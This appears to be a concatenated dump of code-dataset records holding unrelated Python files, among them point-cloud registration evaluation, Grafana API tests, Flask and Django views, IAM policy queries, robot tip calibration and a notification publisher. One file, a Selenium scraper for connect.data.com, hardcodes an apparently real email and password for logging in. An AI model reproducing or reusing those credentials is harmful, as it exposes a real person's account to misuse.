{teaser_best_subopt}.')\n\n # refine with ICP after TEASER\n trans_init = np.identity(4)\n trans_init[:3,:3] = R_teaser\n trans_init[:3,3] = t_teaser\n icp_sol = o3d.registration.registration_icp(\n A_pcd, B_pcd, ICP_TH, trans_init,\n o3d.registration.TransformationEstimationPointToPoint(),\n o3d.registration.ICPConvergenceCriteria(max_iteration=ICP_MAXITERS))\n fitness_icp_teaser = computeFitnessScore(A_pcd,B_pcd,ICP_TH,icp_sol.transformation)\n R_icp_teaser = icp_sol.transformation[:3,:3]\n t_icp_teaser = icp_sol.transformation[:3,3]\n R_err_icp_teaser = getRotationError(R_gt,R_icp_teaser)\n t_err_icp_teaser = getTranslationError(t_gt,t_icp_teaser)\n print(f'ICP-TEASER: R_err: {R_err_icp_teaser}[deg], t_err: {t_err_icp_teaser}[m], fitness: {fitness_icp_teaser}.')\n\n # log results\n log_results[pair_idx,:] = np.asarray([overlap,\n R_err_teaser,t_err_teaser,\n R_err_icp_teaser,t_err_icp_teaser,\n teaser_tim_inlier_ratio,\n teaser_best_subopt,\n teaser_nrMCInliers,\n fitness_teaser,\n fitness_icp_teaser])\n\n# np.savetxt('results/results_70_full.txt',log_results,fmt='%.5f',delimiter=',')","sub_path":"eval_teaser_only_threedmatch.py","file_name":"eval_teaser_only_threedmatch.py","file_ext":"py","file_size_in_byte":6955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"87094956","text":"#!/usr/bin/python3 -u\n# -*- mode:python3; coding:utf-8; tab-width:4 -*-\n\nimport random\nimport numpy as np\n\nfrom .individual import Individual\n\n\nclass Recombination:\n def n_points_crossover(parent_1, parent_2, crossover_rate,\n points_number, offspring, recombination_index):\n random_rate = random.uniform(0.0, 1)\n child_1 = Individual(0)\n child_2 = Individual(0)\n switch = False\n\n if random_rate <= crossover_rate:\n points = random.sample(range(len(parent_1.genes)), points_number)\n if len(parent_1.genes) not in points:\n points.append(len(parent_1.genes))\n points.sort()\n last_point = 0\n for point in points:\n if switch:\n child_1.genes = np.append(child_1.genes,\n parent_1.genes[last_point:point])\n child_2.genes = np.append(child_2.genes,\n parent_2.genes[last_point:point])\n else:\n child_1.genes = np.append(child_1.genes,\n parent_2.genes[last_point:point])\n child_2.genes = np.append(child_2.genes,\n parent_1.genes[last_point:point])\n switch = not switch\n last_point = point\n else:\n child_1.genes = parent_1.genes\n child_2.genes = parent_2.genes\n offspring[recombination_index] = child_1\n offspring[recombination_index + 1] = 
child_2\n","sub_path":"project/source/genetic_algorithm/recombination.py","file_name":"recombination.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"117437535","text":"import requests_mock\r\nimport unittest\r\nfrom grafana_api.package.api.dashboard import Dashboard\r\nfrom config.config import Config\r\n\r\n\r\nclass DashboardTestCase(unittest.TestCase):\r\n def setUp(self):\r\n self.dashboard = Dashboard(\"test.api\", \"test.key\", \"account\", \"password\", \"http\")\r\n self.config = Config()\r\n\r\n @requests_mock.Mocker()\r\n def test_create_folder(self, m):\r\n expected_response = {\r\n \"id\": 31,\r\n \"uid\": \"NtnUR-IMz\",\r\n \"title\": \"test-folder\",\r\n \"url\": \"/dashboards/f/NtnUR-IMz/test-folder\",\r\n \"hasAcl\": False,\r\n \"canSave\": True,\r\n \"canEdit\": True,\r\n \"canAdmin\": True,\r\n \"version\": 1\r\n }\r\n m.post(\"http://test.api/api/folders\", json=expected_response)\r\n team_id = self.dashboard.create_folder(\"test-folder\")\r\n history = m.request_history\r\n self.assertEqual(history[0].json()[\"title\"], \"test-folder\") # 確認這個名稱有帶進去\r\n self.assertEqual(team_id, 31) # 確認是不是真有返回我們要的id\r\n\r\n @requests_mock.Mocker()\r\n def test_import_dashboard_from_a_file(self, m):\r\n expected_response = {\r\n \"id\": 33,\r\n \"slug\": \"node-exporter-full\",\r\n \"status\": \"success\",\r\n \"uid\": \"EEWy_Weiz\",\r\n \"url\": \"/d/EEWy_Weiz/node-exporter-full\",\r\n \"version\": 1\r\n }\r\n m.post(\"http://test.api/api/dashboards/db\", json=expected_response)\r\n response = self.dashboard.import_dashboard_from_a_file(\r\n self.config.DASHBOARD_FOLDER + \"/prod-devops/prod-devops-services.json\", 33,\r\n \"new-folder\")\r\n history = m.request_history\r\n self.assertEqual(history[0].json()[\"folderId\"], 33) # 看是不是真的把33這個id帶進去\r\n self.assertEqual(response.json()[\"status\"], \"success\")\r\n\r\n @requests_mock.Mocker()\r\n def test_get_all_folder_id(self, m):\r\n expected_response = [\r\n {\r\n \"id\": 32,\r\n \"uid\": \"FRMkz-IMk\",\r\n \"title\": \"new-folder\"\r\n },\r\n {\r\n \"id\": 34,\r\n \"uid\": \"VSJziaSGk\",\r\n \"title\": \"new-folder2\"\r\n }\r\n ]\r\n m.get(\"http://test.api/api/folders\", json=expected_response)\r\n response = self.dashboard.get_all_folder_id()\r\n self.assertEqual(len(response.json()), 2)\r\n\r\n @requests_mock.Mocker()\r\n def test_get_folder_id_by_name(self, m):\r\n expected_response = [\r\n {\r\n \"id\": 22,\r\n \"uid\": \"FRMkz-IMk\",\r\n \"title\": \"new-folder\"\r\n },\r\n {\r\n \"id\": 34,\r\n \"uid\": \"VSJziaSGk\",\r\n \"title\": \"new-folder2\"\r\n }\r\n ]\r\n m.get(\"http://test.api/api/folders\", json=expected_response)\r\n response = self.dashboard.get_folder_id_by_name(\"new-folder2\")\r\n self.assertEqual(response, 34)\r\n","sub_path":"test/api/test_dashboard.py","file_name":"test_dashboard.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"599080813","text":"'''\nCreated on 17-Oct-2017\n\n@author: Administrator\n'''\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nimport requests\nfrom pyquery import PyQuery\nimport csv\nfrom time import gmtime, strftime\n\n\n\nusername = 'janevskidalibor@gmail.com'\npassword = 'NewLogin456'\n\n\n\n\n\n#creating a output 
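The crossover above threads index-tracking state through the loop; the same n-point scheme in a compact stand-alone form (function name and seed are illustrative):

import random

def n_point_crossover(p1, p2, n_points, rng=random):
    # Cut points partition the genome; segments alternate between parents.
    points = sorted(rng.sample(range(1, len(p1)), n_points)) + [len(p1)]
    c1, c2 = [], []
    last, take_first = 0, True
    for point in points:
        src1, src2 = (p1, p2) if take_first else (p2, p1)
        c1 += src1[last:point]
        c2 += src2[last:point]
        take_first, last = not take_first, point
    return c1, c2

random.seed(1)
print(n_point_crossover(list("AAAAAA"), list("bbbbbb"), 2))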
file\nfile_export = open('connect_data_output'+'_'+strftime(\"%Y-%m-%d_%H-%M-%S\", gmtime())+'.csv', 'w', newline='')\nwr = csv.writer(file_export, quoting=csv.QUOTE_ALL)\nheaders = ['URL','Name', 'Website','Headquarters','Phone','Industries','Employees','Revenue','Ownership','Website']\nwr.writerow(headers)\ntarget_url = open('target_url.txt').read()\n\ntry:\n chromeOptions = webdriver.ChromeOptions()\n prefs = {\"profile.managed_default_content_settings.images\": 2}\n chromeOptions.add_experimental_option(\"prefs\", prefs)\n # chromeOptions.add_argument('headless')\n chromeOptions.add_argument('disable-gpu')\n driver = webdriver.Chrome('./chromedriver', chrome_options=chromeOptions)\nexcept Exception as e:\n print ('Failed to start chromedriver ' + str(e))\n exit()\n\ndef login_to_connect_data(driver):\n try:\n driver.get('https://connect.data.com/login?source=HPTopNav')\n driver.find_element_by_id('j_username').send_keys(username)\n driver.find_element_by_id('j_password').send_keys(password)\n driver.find_element_by_id('_spring_security_remember_me').click()\n driver.find_element_by_class_name('button-standard-text').click()\n except Exception as e:\n print ('Error in entering login information')\n \n try:\n element = WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.CSS_SELECTOR, \".account-information .screenname\")))\n print (\"Login Successful\")\n except Exception as e:\n print ('Login failed - '+ str(e))\n\ndef get_all_links(driver):\n temp_links = []\n time.sleep(5)\n while True:\n \n all_links = driver.find_elements_by_css_selector('.name')\n for link in all_links:\n try:\n temp_links.append((link.find_element_by_css_selector('.companyName').get_attribute(\"href\"),link.find_element_by_css_selector('.website').text))\n except Exception as e:\n pass\n \n page_length_css = len(driver.find_elements_by_css_selector('.table-navigation-button-next.table-navigation-image.table-navigation-next-image'))\n if page_length_css == 4:\n break\n next_page = driver.find_elements_by_css_selector('.table-navigation-button-next.table-navigation-image.table-navigation-next-image-active')\n driver.execute_script(\"arguments[0].click();\", next_page[0])\n time.sleep(10)\n return temp_links\n\n \nlogin_to_connect_data(driver)\ndriver.get(target_url)\nresults_links = get_all_links(driver)\ndriver.quit()\n\ncount = 0\ntotal_results = str(len(results_links)) \nfor result in results_links:\n print ('Count : '+str(count)+'/'+total_results+'. 
Extracting - '+result[0])\n r = requests.get(result[0]).text\n pq = PyQuery(r)\n result_dataset = []\n result_dataset.append(str(result[0]))\n for data in pq('.seo-company-info tr td:nth-child(2)'):\n result_dataset.append(str(data.text).strip())\n result_dataset.append(str(result[1]))\n wr.writerow(result_dataset)\n count+=1\n\n","sub_path":"Dana_Lindahl/connect_data.py","file_name":"connect_data.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"300887632","text":"from flask import render_template, request, redirect, url_for, flash\n\nfrom shop import app, db\nfrom .models import Brand, Category\n\n@app.route(\"/addbrand\", methods=['GET', 'POST'])\ndef addbrand():\n if request.method == \"POST\":\n getbrand = request.form.get(\"brand\")\n brand = Brand(name=getbrand)\n db.session.add(brand)\n db.session.commit()\n flash(f'The Brand {getbrand} was added to your database', 'success')\n return redirect(url_for('addbrand'))\n return render_template(\"products/addbrand.html\", brands=\"brands\", title=\"Add Brand Page\")\n\n@app.route(\"/addcat\", methods=['GET', 'POST'])\ndef addcat():\n if request.method == \"POST\":\n getcat = request.form.get(\"category\")\n cat = Category(name=getcat)\n db.session.add(cat)\n db.session.commit()\n flash(f'The Category {getcat} was added to your database', 'success')\n return redirect(url_for('addbrand'))\n return render_template(\"products/addbrand.html\", brands=\"brands\", title=\"Add Brand Page\")\n","sub_path":"shop/products/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"16851613","text":"from collections import defaultdict\n\nfrom django import http\nfrom django.core import serializers\nimport django.utils.simplejson as json\nfrom django.views.generic import TemplateView\nfrom django.views.generic.list import BaseListView, ListView\n\nfrom HVZ.main.models import Building, Game, Player, School\nfrom HVZ.feed.models import Meal\n\n\nclass FullStatPage(TemplateView):\n template_name = 'stats/the_stats.html'\n\n def get_context_data(self, *args, **kwargs):\n context = super(FullStatPage, self).get_context_data(*args, **kwargs)\n\n return context\n\n\nclass MealLog(ListView):\n template_name = 'stats/meal_log.html'\n\n def get_queryset(self, *args, **kwargs):\n return Meal.objects.filter(eater__game=Game.nearest_game()).select_related(\n 'eater__user__first_name', 'eater__user__last_name',\n 'eaten__user__first_name', 'eaten__user__last_name').order_by('time')\n\n\nclass JSONResponseMixin(object):\n SERIALIZER = serializers\n FIELD_NAME = 'object_list'\n FIELDS = ()\n\n def render_to_response(self, context):\n \"Returns a JSON response containing 'context' as payload\"\n return self.get_json_response(self.convert_context_to_json(context))\n\n def get_json_response(self, content, **httpresponse_kwargs):\n \"Construct an `HttpResponse` object.\"\n return http.HttpResponse(content,\n content_type='application/json',\n **httpresponse_kwargs)\n\n def raw_serialization(self, context):\n raw_data = self.SERIALIZER.serialize(\n 'python',\n context[self.FIELD_NAME],\n fields=self.FIELDS,\n )\n\n return [d['fields'] for d in raw_data]\n\n def convert_context_to_json(self, context):\n \"Convert the context dictionary into a JSON object\"\n # Note: This is *EXTREMELY* naive; in reality, you'll need\n # to do much more complex handling to 
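The detail-page scrape above leans on pyquery CSS selectors; here is the same second-cell extraction against stand-in HTML (the real connect.data.com markup is not reproduced):

from pyquery import PyQuery

html = """
<table class="seo-company-info">
  <tr><td>Phone</td><td>555-0100</td></tr>
  <tr><td>Employees</td><td>250</td></tr>
</table>
"""
pq = PyQuery(html)
# Same selector shape as the scraper: the value cell of each info row.
values = [str(td.text).strip() for td in pq(".seo-company-info tr td:nth-child(2)")]
print(values)  # ['555-0100', '250']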
ensure that arbitrary\n # objects -- such as Django model instances or querysets\n # -- can be serialized as JSON.\n\n return json.dumps(self.raw_serialization(context))\n\n\nclass JSONPlayerStats(JSONResponseMixin, BaseListView):\n FIELDS = ('team', 'grad_year', 'school', 'dorm')\n # def get_context_data(self, *args, **kwargs):\n # context = super(JSONPlayerStats, self).get_context_data(*args, **kwargs)\n\n # context['objects'] = Player.objects.all().filter(game=Game.nearest_game()).values(\n # 'team',\n # 'grad_year',\n # 'school',\n # 'dorm',\n # )\n\n # return context\n def get_queryset(self):\n return Player.objects.all().filter(game=Game.nearest_game())\n\n def raw_serialization(self, context):\n actual = super(JSONPlayerStats, self).raw_serialization(context)\n\n aggregates = {\n 'grad_year': [\n {'label': 'zombies', 'data': defaultdict(int), 'color': 'rgb(0, 128, 0)'},\n {'label': 'humans', 'data': defaultdict(int), 'color': 'rgb(128,0,0)'},\n ],\n 'dorm': [\n {'label': 'zombies', 'data': defaultdict(int), 'color': 'rgb(0, 128, 0)'},\n {'label': 'humans', 'data': defaultdict(int), 'color': 'rgb(128,0,0)'},\n ],\n 'school': [\n {'label': 'zombies', 'data': defaultdict(int), 'color': 'rgb(0, 128, 0)'},\n {'label': 'humans', 'data': defaultdict(int), 'color': 'rgb(128,0,0)'},\n ],\n }\n\n dorms = Building.objects.filter(building_type=\"D\").order_by(\"name\").values('id', 'name')\n dorm_ordering = list(b['id'] for b in dorms)\n dorm_name_ordering = list(b['name'] for b in dorms)\n axis_lookup = {\n 'grad_year': {}, # 2013, etc.\n 'dorm': dict(enumerate(dorm_name_ordering)), # 0: Atwood Dorm, etc.\n 'school': {d['id']: d['name'] for d in School.objects.order_by('name').values('id', 'name')},\n }\n\n\n for item in actual:\n index = 0 if item['team'] == \"Z\" else 1\n\n if item['grad_year']:\n axis_lookup['grad_year'].setdefault(item['grad_year'], str(item['grad_year']))\n\n for key in aggregates:\n if item[key]:\n try:\n if key == 'dorm':\n aggregates[key][index]['data'][dorm_ordering.index(item[key])] += 1\n else:\n aggregates[key][index]['data'][item[key]] += 1\n except KeyError:\n continue\n\n aggregates['ticks'] = axis_lookup\n # convert all data dicts to arrays\n for key in aggregates:\n if key == \"ticks\":\n for tick_set in aggregates[key]:\n aggregates[key][tick_set] = [[int(_id), val] for _id, val in aggregates[key][tick_set].items()]\n continue\n for data_set in aggregates[key]:\n if key == 'dorm':\n # flip dorm data series for horizontal bars\n data_set['data'] = [[val, dkey] for dkey, val in data_set['data'].items()]\n else:\n data_set['data'] = [[dkey, val] for dkey, val in data_set['data'].items()]\n return aggregates\n","sub_path":"HVZ/HVZ/stats/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"260081063","text":"\"\"\"IAM Database queries that are not specific to either the Actions, ARNs, or Condition Keys tables.\"\"\"\nfrom sqlalchemy import and_\nfrom policy_sentry.shared.database import ActionTable\n\n\ndef get_all_actions(db_session, lowercase=False):\n \"\"\"\n Gets a huge list of all IAM actions. 
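Outside of Django, the per-team tallying in JSONPlayerStats.raw_serialization reduces to defaultdict counting followed by flattening each counter into [x, y] pairs for the charting payload. The records below are invented:

from collections import defaultdict

players = [
    {"team": "Z", "grad_year": 2013},
    {"team": "H", "grad_year": 2013},
    {"team": "Z", "grad_year": 2014},
    {"team": "Z", "grad_year": 2013},
]
series = {"Z": defaultdict(int), "H": defaultdict(int)}
for player in players:
    series[player["team"]][player["grad_year"]] += 1
# Flatten each counter into sorted [x, y] pairs, as the view does.
chart_data = {team: sorted([year, n] for year, n in counts.items())
              for team, counts in series.items()}
print(chart_data)  # {'Z': [[2013, 2], [2014, 1]], 'H': [[2013, 1]]}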
This is used as part of the policyuniverse approach to minimizing\n IAM Policies to meet AWS-mandated character limits on policies.\n\n :param db_session: SQLAlchemy database session object\n :param lowercase: Set to true to have the list of actions be in all lowercase strings.\n :return: A list of all actions present in the database.\n \"\"\"\n all_actions = set()\n rows = db_session.query(ActionTable.service, ActionTable.name).distinct(\n and_(ActionTable.service, ActionTable.name)\n )\n for row in rows:\n if lowercase:\n all_actions.add(str(row.service.lower() + \":\" + row.name.lower()))\n else:\n all_actions.add(str(row.service + \":\" + row.name))\n # Remove duplicates\n # all_actions = set(dict.fromkeys(all_actions))\n return all_actions\n\n\ndef get_all_service_prefixes(db_session):\n \"\"\"\n Gets all the AWS service prefixes from the actions table.\n\n If the action table does NOT have specific IAM actions (and therefore only supports * actions),\n then it will not be included in the response.\n\n :param db_session: The SQLAlchemy database session\n :return: A list of all AWS service prefixes present in the table.\n \"\"\"\n service_prefixes = []\n rows = db_session.query(ActionTable.service).distinct(ActionTable.service)\n for row in rows:\n if row.service not in service_prefixes:\n service_prefixes.append(row.service)\n # Remove duplicates\n service_prefixes = list(dict.fromkeys(service_prefixes)) # remove duplicates\n service_prefixes.sort()\n return service_prefixes\n","sub_path":"policy_sentry/querying/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"451318318","text":"import logging\nfrom typing import (\n Dict, Awaitable, Callable, Any, Set, List, Optional,\n TYPE_CHECKING)\nfrom opentrons.types import Mount, Point, Location\nfrom opentrons.config import feature_flags as ff\nfrom opentrons.calibration_storage import modify\nfrom opentrons.hardware_control import ThreadManager, CriticalPoint\nfrom opentrons.protocol_api import labware\nfrom opentrons.protocols.geometry import deck\n\nimport robot_server.robot.calibration.util as uf\nfrom robot_server.service.errors import RobotServerError\nfrom robot_server.service.session.models.command import (\n CalibrationCommand, TipLengthCalibrationCommand)\nfrom robot_server.robot.calibration.constants import (\n TIP_RACK_LOOKUP_BY_MAX_VOL,\n SHORT_TRASH_DECK,\n STANDARD_DECK\n)\nfrom .state_machine import (\n TipCalibrationStateMachine\n)\nfrom .constants import (\n TipCalibrationState as State,\n TRASH_WELL,\n TIP_RACK_SLOT,\n CAL_BLOCK_SETUP_BY_MOUNT,\n MOVE_TO_TIP_RACK_SAFETY_BUFFER,\n MOVE_TO_REF_POINT_SAFETY_BUFFER,\n TRASH_REF_POINT_OFFSET\n)\nfrom ..errors import CalibrationError\nfrom ..helper_classes import (\n RequiredLabware,\n AttachedPipette\n)\n\nif TYPE_CHECKING:\n from opentrons_shared_data.labware import LabwareDefinition\n\n\nMODULE_LOG = logging.getLogger(__name__)\n\n\"\"\"\nA collection of functions that allow a consumer to prepare and update\ncalibration data associated with the combination of a pipette tip type and a\nunique (by serial number) physical pipette.\n\"\"\"\n\n# TODO: BC 2020-07-08: type all command logic here with actual Model type\nCOMMAND_HANDLER = Callable[..., Awaitable]\n\nCOMMAND_MAP = Dict[str, COMMAND_HANDLER]\n\n\nclass TipCalibrationUserFlow:\n def __init__(self,\n hardware: ThreadManager,\n mount: Mount,\n has_calibration_block: bool,\n tip_rack: 
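get_all_actions() above boils down to a DISTINCT projection over two columns plus string assembly. A self-contained SQLAlchemy sketch against an in-memory SQLite table (the table and rows are stand-ins for policy_sentry's ActionTable):

from sqlalchemy import Column, Integer, String, create_engine
from sqlalchemy.orm import declarative_base, sessionmaker

Base = declarative_base()

class Action(Base):
    __tablename__ = "action"
    id = Column(Integer, primary_key=True)
    service = Column(String)
    name = Column(String)

engine = create_engine("sqlite://")
Base.metadata.create_all(engine)
session = sessionmaker(bind=engine)()
session.add_all([Action(service="s3", name="GetObject"),
                 Action(service="s3", name="GetObject"),
                 Action(service="ec2", name="RunInstances")])
session.commit()

# DISTINCT over the (service, name) projection, then "service:name" strings.
rows = session.query(Action.service, Action.name).distinct()
actions = {f"{row.service}:{row.name}" for row in rows}
print(sorted(actions))  # ['ec2:RunInstances', 's3:GetObject']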
'LabwareDefinition'):\n self._hardware = hardware\n self._mount = mount\n self._has_calibration_block = has_calibration_block\n self._hw_pipette = self._hardware._attached_instruments[mount]\n if not self._hw_pipette:\n raise RobotServerError(\n definition=CalibrationError.NO_PIPETTE_ON_MOUNT,\n mount=mount)\n self._tip_origin_pt: Optional[Point] = None\n self._nozzle_height_at_reference: Optional[float] = None\n\n deck_load_name = SHORT_TRASH_DECK if ff.short_fixed_trash() \\\n else STANDARD_DECK\n self._deck = deck.Deck(load_name=deck_load_name)\n self._tip_rack = self._get_tip_rack_lw(tip_rack)\n self._initialize_deck()\n\n self._current_state = State.sessionStarted\n self._state_machine = TipCalibrationStateMachine()\n\n self._command_map: COMMAND_MAP = {\n CalibrationCommand.load_labware: self.load_labware,\n CalibrationCommand.jog: self.jog,\n CalibrationCommand.pick_up_tip: self.pick_up_tip,\n CalibrationCommand.invalidate_tip: self.invalidate_tip,\n CalibrationCommand.save_offset: self.save_offset,\n TipLengthCalibrationCommand.move_to_reference_point: self.move_to_reference_point, # noqa: E501\n CalibrationCommand.move_to_tip_rack: self.move_to_tip_rack, # noqa: E501\n CalibrationCommand.exit: self.exit_session,\n }\n\n def _set_current_state(self, to_state: State):\n self._current_state = to_state\n\n @property\n def current_state(self) -> State:\n return self._current_state\n\n def get_pipette(self) -> AttachedPipette:\n # TODO(mc, 2020-09-17): s/tip_length/tipLength\n return AttachedPipette( # type: ignore[call-arg]\n model=self._hw_pipette.model,\n name=self._hw_pipette.name,\n tip_length=self._hw_pipette.config.tip_length,\n mount=str(self._mount),\n serial=self._hw_pipette.pipette_id\n )\n\n def get_required_labware(self) -> List[RequiredLabware]:\n slots = self._deck.get_non_fixture_slots()\n lw_by_slot = {s: self._deck[s] for s in slots if self._deck[s]}\n return [\n RequiredLabware.from_lw(lw, s) # type: ignore\n for s, lw in lw_by_slot.items()]\n\n async def handle_command(self,\n name: Any,\n data: Dict[Any, Any]):\n \"\"\"\n Handle a client command\n\n :param name: Name of the command\n :param data: Data supplied in command\n :return: None\n \"\"\"\n next_state = self._state_machine.get_next_state(self._current_state,\n name)\n\n handler = self._command_map.get(name)\n if handler is not None:\n await handler(**data)\n self._set_current_state(next_state)\n MODULE_LOG.debug(f'TipCalUserFlow handled command {name}, transitioned'\n f'from {self._current_state} to {next_state}')\n\n async def load_labware(self):\n pass\n\n async def move_to_tip_rack(self):\n # point safely above target tip well in tip rack\n pt_above_well = self._tip_rack.wells()[0].top().point + \\\n MOVE_TO_TIP_RACK_SAFETY_BUFFER\n if self._tip_origin_pt is not None:\n # use jogged to x and y offsets only if returning tip to rack\n await self._move(Location(Point(self._tip_origin_pt.x,\n self._tip_origin_pt.y,\n pt_above_well.z),\n None))\n else:\n await self._move(Location(pt_above_well, None))\n\n async def move_to_reference_point(self):\n to_loc = self._get_reference_point()\n await self._move(to_loc)\n\n def _get_reference_point(self) -> Location:\n if self._has_calibration_block:\n slot = CAL_BLOCK_SETUP_BY_MOUNT[self._mount]['slot']\n well = CAL_BLOCK_SETUP_BY_MOUNT[self._mount]['well']\n calblock: labware.Labware = self._deck[slot] # type: ignore\n calblock_loc = calblock.wells_by_name()[well].top()\n return calblock_loc.move(point=MOVE_TO_REF_POINT_SAFETY_BUFFER)\n else:\n trash = 
self._deck.get_fixed_trash()\n assert trash\n trash_loc = trash.wells_by_name()[TRASH_WELL].top()\n return trash_loc.move(TRASH_REF_POINT_OFFSET +\n MOVE_TO_REF_POINT_SAFETY_BUFFER)\n\n async def save_offset(self):\n if self._current_state == State.measuringNozzleOffset:\n # critical point would default to nozzle for z height\n cur_pt = await self._get_current_point(\n critical_point=None)\n self._nozzle_height_at_reference = cur_pt.z\n elif self._current_state == State.measuringTipOffset:\n assert self._hw_pipette.has_tip\n assert self._nozzle_height_at_reference is not None\n # set critical point explicitly to nozzle\n cur_pt = await self._get_current_point(\n critical_point=CriticalPoint.NOZZLE)\n tip_length_offset = cur_pt.z - self._nozzle_height_at_reference\n\n # TODO: 07-22-2020 parent slot is not important when tracking\n # tip length data, hence the empty string, we should remove it\n # from create_tip_length_data in a refactor\n tip_length_data = modify.create_tip_length_data(\n self._tip_rack._definition, '',\n tip_length_offset)\n modify.save_tip_length_calibration(self._hw_pipette.pipette_id,\n tip_length_data)\n\n def _get_default_tip_length(self) -> float:\n tiprack: labware.Labware = self._deck[TIP_RACK_SLOT] # type: ignore\n full_length = tiprack.tip_length\n overlap_dict: Dict = \\\n self._hw_pipette.config.tip_overlap\n default = overlap_dict['default']\n overlap = overlap_dict.get(tiprack.uri, default)\n return full_length - overlap\n\n def _get_critical_point_override(self) -> Optional[CriticalPoint]:\n return (CriticalPoint.FRONT_NOZZLE if\n self._hw_pipette.config.channels == 8 else None)\n\n async def _get_current_point(\n self,\n critical_point: CriticalPoint = None) -> Point:\n return await self._hardware.gantry_position(self._mount,\n critical_point)\n\n async def jog(self, vector):\n await self._hardware.move_rel(mount=self._mount,\n delta=Point(*vector))\n\n async def pick_up_tip(self):\n await uf.pick_up_tip(self, tip_length=self._get_default_tip_length())\n\n async def invalidate_tip(self):\n await uf.invalidate_tip(self)\n\n async def exit_session(self):\n await self.move_to_tip_rack()\n await self._return_tip()\n\n def _get_tip_rack_lw(self,\n tip_rack_def: 'LabwareDefinition') -> labware.Labware:\n try:\n return labware.load_from_definition(\n tip_rack_def,\n self._deck.position_for(TIP_RACK_SLOT))\n except Exception:\n raise RobotServerError(definition=CalibrationError.BAD_LABWARE_DEF)\n\n def _get_alt_tip_racks(self) -> Set[str]:\n pip_vol = self._hw_pipette.config.max_volume\n return set(TIP_RACK_LOOKUP_BY_MAX_VOL[str(pip_vol)].alternatives)\n\n def _initialize_deck(self):\n self._deck[TIP_RACK_SLOT] = self._tip_rack\n\n if self._has_calibration_block:\n cb_setup = CAL_BLOCK_SETUP_BY_MOUNT[self._mount]\n self._deck[cb_setup['slot']] = labware.load(\n cb_setup['load_name'],\n self._deck.position_for(cb_setup['slot']))\n\n async def _return_tip(self):\n await uf.return_tip(self, tip_length=self._get_default_tip_length())\n\n async def _move(self, to_loc: Location):\n await uf.move(self, to_loc)\n","sub_path":"robot-server/robot_server/robot/calibration/tip_length/user_flow.py","file_name":"user_flow.py","file_ext":"py","file_size_in_byte":9986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"126693346","text":"from socket import SocketIO\n\nfrom flask import jsonify\nfrom jsonpickle import json\n\nfrom project.domain_layer.users_managment.UsersManager import UsersManager\n\n\nclass Publisher:\n def 
__init__(self, sio: SocketIO):\n self.users_manager = None\n self.sio = sio\n\n def set_users_manager(self, users_manager: UsersManager):\n self.users_manager = users_manager\n\n def notify(self, message, user):\n print('publisher message: ' + message)\n if self.users_manager.check_if_loggedin(user):\n self.send_notification(user, message)\n else:\n self.users_manager.add_notification(user, message)\n\n def send_notification(self, username, message):\n self.sio.send({\n 'messages': [message]\n }, room=username)\n\n def store_status_update(self, store_id, store_name, users: [str], status=''):\n \"\"\"\n send \"store closes/reopens\" event notification message\n :param status: open/close.\n :param store_id:\n :param store_name:\n :param users: list of recipients (user names)\n :return:\n \"\"\"\n open_message = \"Dear {}, \" \\\n 'we are glad to inform your store: {} is now open!'\n close_message = 'Dear {}, ' \\\n 'your store: {} has been closed.'\n for owner in users:\n if status == 'open':\n message = open_message\n else:\n message = close_message\n notification = message.format(owner, store_name)\n self.notify(notification, owner)\n\n # store owner get notification when their appointment as store owner was removed\n def store_ownership_update(self, store_id, store_name, users: [str]):\n \"\"\"\n send \"store owner appointment\" event notification message\n :param store_id:\n :param store_name:\n :param users: list of recipients (user names)\n :return:\n \"\"\"\n message = 'Dear {}, ' \\\n 'your store owner appointment of store: {} was removed and is no longer valid.'\n for owner in users:\n notification = message.format(owner, store_name)\n self.notify(notification, owner)\n\n # store owner get notification when a client buys a product from the store\n def purchase_update(self, store_id, store_name, users: [str]):\n \"\"\"\n send \"new purchase\" event notification message\n :param store_id:\n :param store_name:\n :param users: list of recipients (user names)\n :return:\n \"\"\"\n message = 'Dear {}, ' \\\n 'We are glad to inform that an item from your store: {} has been purchased. 
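Stripped of Flask-SocketIO and the user manager, Publisher.notify above is a store-and-forward pattern: deliver to online users immediately, queue for everyone else. A minimal sketch with invented class and method names:

from collections import defaultdict

class MiniPublisher:
    def __init__(self):
        self.online = set()
        self.pending = defaultdict(list)

    def notify(self, user, message):
        if user in self.online:
            print(f"-> {user}: {message}")      # stands in for sio.send(...)
        else:
            self.pending[user].append(message)  # held like add_notification

    def login(self, user):
        self.online.add(user)
        for message in self.pending.pop(user, []):
            self.notify(user, message)

publisher = MiniPublisher()
publisher.notify("alice", "your store: Foo is now open!")
publisher.login("alice")  # queued message is delivered on login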
